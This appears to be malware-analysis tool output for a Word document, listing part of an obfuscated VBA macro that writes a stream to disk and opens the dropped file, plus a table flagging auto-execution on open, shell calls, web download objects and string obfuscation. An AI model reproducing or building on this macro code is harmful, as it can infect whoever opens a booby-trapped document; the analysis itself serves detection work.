Set ´¨³¦¤¼µ´¡»¹¨µ«¨ª¤¢·«ª¥²¢¿¦µ®£¦¬·¼¼»¾¶²¶§°°º¼½¹§²£¬¸¹©¸º¬¦¶¾·¢¾£¤½²¼´·©·½ºª¬²¾¢§©¢¸¯¢ = CreateObject("adodb.stream")
´¨³¦¤¼µ´¡»¹¨µ«¨ª¤¢·«ª¥²¢¿¦µ®£¦¬·¼¼»¾¶²¶§°°º¼½¹§²£¬¸¹©¸º¬¦¶¾·¢¾£¤½²¼´·©·½ºª¬²¾¢§©¢¸¯¢.Open
´¨³¦¤¼µ´¡»¹¨µ«¨ª¤¢·«ª¥²¢¿¦µ®£¦¬·¼¼»¾¶²¶§°°º¼½¹§²£¬¸¹©¸º¬¦¶¾·¢¾£¤½²¼´·©·½ºª¬²¾¢§©¢¸¯¢.Type = µ¬¥´¨³¦¤¼µ´¡»¹¨µ«¨ª¤¢·«ª¥²¢¿¦µ®£¦¬·¼¼»¾¶²¶§°°º¼½¹§²£¬¸¹©¸º¬¦¶¾·¢¾£¤½²¼´·©·½ºª¬²¾¢§©¢¸¯¢©£»¸¦¤¿¤¡´¢
´¨³¦¤¼µ´¡»¹¨µ«¨ª¤¢·«ª¥²¢¿¦µ®£¦¬·¼¼»¾¶²¶§°°º¼½¹§²£¬¸¹©¸º¬¦¶¾·¢¾£¤½²¼´·©·½ºª¬²¾¢§©¢¸¯¢.Write ¢©£»¸¦¤¿¤¡´¢¯©¨©§·»¿³ºº«©¨¬³»·£®¬°®«£¥¯§¸¸¦¢¶¨´©¶¯°¯¨«¡ª³§¡´°¸®¤°²·ª®µ¶¦£¹¾¸¥§§¨¥
´¨³¦¤¼µ´¡»¹¨µ«¨ª¤¢·«ª¥²¢¿¦µ®£¦¬·¼¼»¾¶²¶§°°º¼½¹§²£¬¸¹©¸º¬¦¶¾·¢¾£¤½²¼´·©·½ºª¬²¾¢§©¢¸¯¢.SaveToFile §¨¥®ª¦µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬´¸¿²½²¿¥³¥¦ª°¡½³¹½»®££º»¯¡«¶¿´¸¬§®¶³³²µ¤¨¤¾¡©°³´¢½°¬¹·¡¼¶°¹¿µ, µ¬¥´¨³¦¤¼µ´¡»¹¨µ«¨ª¤¢·«ª¥²¢¿¦µ®£¦¬·¼¼»¾¶²¶§°°º¼½¹§²£¬¸¹©¸º¬¦¶¾·¢¾£¤½²¼´·©·½ºª¬²¾¢§©¢¸¯¢©£»¸¦¤¿¤¡´¢ + µ¬¥´¨³¦¤¼µ´¡»¹¨µ«¨ª¤¢·«ª¥²¢¿¦µ®£¦¬·¼¼»¾¶²¶§°°º¼½¹§²£¬¸¹©¸º¬¦¶¾·¢¾£¤½²¼´·©·½ºª¬²¾¢§©¢¸¯¢©£»¸¦¤¿¤¡´¢
´¨³¦¤¼µ´¡»¹¨µ«¨ª¤¢·«ª¥²¢¿¦µ®£¦¬·¼¼»¾¶²¶§°°º¼½¹§²£¬¸¹©¸º¬¦¶¾·¢¾£¤½²¼´·©·½ºª¬²¾¢§©¢¸¯¢.Close
End If
¶¾·¢¾£¤½²¼´·©·½ºª¬²¾¢§©¢¸¯¢©£»¸¦¤¿¤¡´¢¯©¨©§·»¿³ºº«©¨¬³»·£®¬°®«£¥¯§¸¸¦¢¶¨´©¶¯°¯¨«¡ª³§¡´°¸®¤°²·ª.Open (§¨¥®ª¦µª«¢¨¦«´ª¹·¤ª²¤©¡µ¥¥®¬´¸¿²½²¿¥³¥¦ª°¡½³¹½»®££º»¯¡«¶¿´¸¬§®¶³³²µ¤¨¤¾¡©°³´¢½°¬¹·¡¼¶°¹¿µ)
End Sub

-------------------------------------------------------------------------------
VBA MACRO NewMacros.bas 
in file: ea1e38f0e64061c6b47899741c81e277cbb81b070c30b451a5ebd904158b66fa.doc - OLE stream: 'Macros/VBA/NewMacros'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
Sub doc()
'
' doc Macro
'
'

End Sub
+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |Document_Open       |Runs when the Word or Publisher document is  |
|          |                    |opened                                       |
|Suspicious|Open                |May open a file                              |
|Suspicious|Write               |May write to a file (if combined with Open)  |
|Suspicious|adodb.stream        |May create a text file                       |
|Suspicious|SaveToFile          |May create a text file                       |
|Suspicious|Shell               |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|WScript.Shell       |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|Call                |May call a DLL using Excel 4 Macros (XLM/XLF)|
|Suspicious|CreateObject        |May create an OLE object                     |
|Suspicious|Shell.Application   |May run an application (if combined with     |
|          |                    |CreateObject)                                |
|Suspicious|microsoft.xmlhttp   |May download files from the Internet         |
|Suspicious|Chr                 |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
|Suspicious|Hex Strings         |Hex-encoded strings were detected, may be    |
|          |                    |used to obfuscate strings (option --decode to|
|          |                    |see all)                                     |
+----------+--------------------+---------------------------------------------+

